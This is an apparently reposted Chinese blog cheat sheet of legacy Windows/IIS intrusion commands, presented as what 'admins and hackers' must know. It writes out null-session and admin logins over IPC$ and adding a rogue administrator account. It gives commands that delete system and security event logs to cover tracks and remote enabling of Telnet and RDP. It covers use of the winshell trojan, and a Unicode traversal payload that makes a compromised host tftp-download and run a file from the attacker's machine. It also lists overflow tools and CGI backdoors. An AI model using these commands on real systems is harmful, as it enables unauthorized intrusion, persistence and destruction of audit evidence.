网管和黑客都必须知道的命令

与远程主机建立空管连接 net use IP地址ipc$ "" /use:""
  以管理员身份登录远程主机 net use IP地址ipc$ "密码" /use:"Administrator"
  传送文件到远程主机WINNT目录下copy 本机目录路径程序 IP地址admin$
  查看远程主机时间 net time IP地址
  定时启动某个程序 at IP地址 02:18 readme.exe
  查看共享 net view IP地址
  查看netbios工作组列表 nBTstat -A IP地址
  将远程主机C盘映射为自己的F盘 net use f: IP地址c$ ""/user:"Administrator"
  这两条把自己增加到管理员组: net user 用户名 密码 /add
  net locaLGroup Administrators 用户名 /add
  断开连接 net use IP地址ipc$ /delete

  扫尾:
  del C:winntsystem32logfiles*.*
  del C:winntssytem32config*.evt
  del C:winntsystem32dTCLog*.*
  del C:winntsystem32*.log
  del C:winntsystem32*.txt
  del C:winnt*.txt
  del C:winnt*.log[@more@]一、netsvc.exe
  下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
  netsvc /list IP地址
  netsvc schedule IP地址 /query
  netsvc IP地址 schedule /start

二、OpenTelnet.exe
  远程启动主机的Telnet服务,并绑定端口到7878,例如:
  OpenTelnet IP地址 用户名 密码 1 7878
  然后就可以telnet到主机的7878端口,进入DOS方式下:
  telnet IP地址 7878

三、winshell.exe
  一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
  p Path (查看winshell主程序的路径信息)
  b reBoot (重新启动机器)
  d shutDown (关闭机器)
  s Shell (执行后你就会看到可爱的“C:>”)
  x eXit (退出本次登录会话,此命令并不终止winshell的运行)
  CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)

四、3389登陆器,GUI方式登录远程主机的

五、elsave.exe
  事件日志清除工具
  elsave -s IP地址 -l "application" -C
  elsave -s IP地址 -l "system" -C
  elsave -s IP地址 -l "security" -C
  执行后成功清除应用程序日志,系统日志,安全日志
六、hbulot.exe
  开启win2kserver和winxp的3389服务
  hbulot (/r)

七、nc.exe(netcat.exe)
  一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
  想要连接到某处: nc (-options) hostname port(s)(ports) ...
  绑定端口等待连接: nc -l -p port (-options) (hostname) (port)

参数:
  -e prog 程序重定向,一旦连接,就执行 (危险!)
  -g gateway source-routing hop point(s), up to 8
  -G num source-routing pointer: 4, 8, 12, ...
  -h 帮助信息
  -i secs 延时的间隔
  -l 监听模式,用于入站连接
  -n 指定数字的IP地址,不能用hostname
  -o file 记录16进制的传输
  -p port 本地端口号
  -r 任意指定本地及远程端口
  -s addr 本地源地址
  -u UDP模式
  -v 详细输出——用两个-v可得到更详细的内容
  -w secs timeout的时间
  -z 将输入输出关掉——用于扫描时

八、TFTPD32.EXE
  把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
  http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名
  然后可以直接令文件运行:
  http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

九、prihack.exe是IIS的printer远程缓冲区溢出工具
  idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。

一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接.

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/79126/viewspace-995606/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/79126/viewspace-995606/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值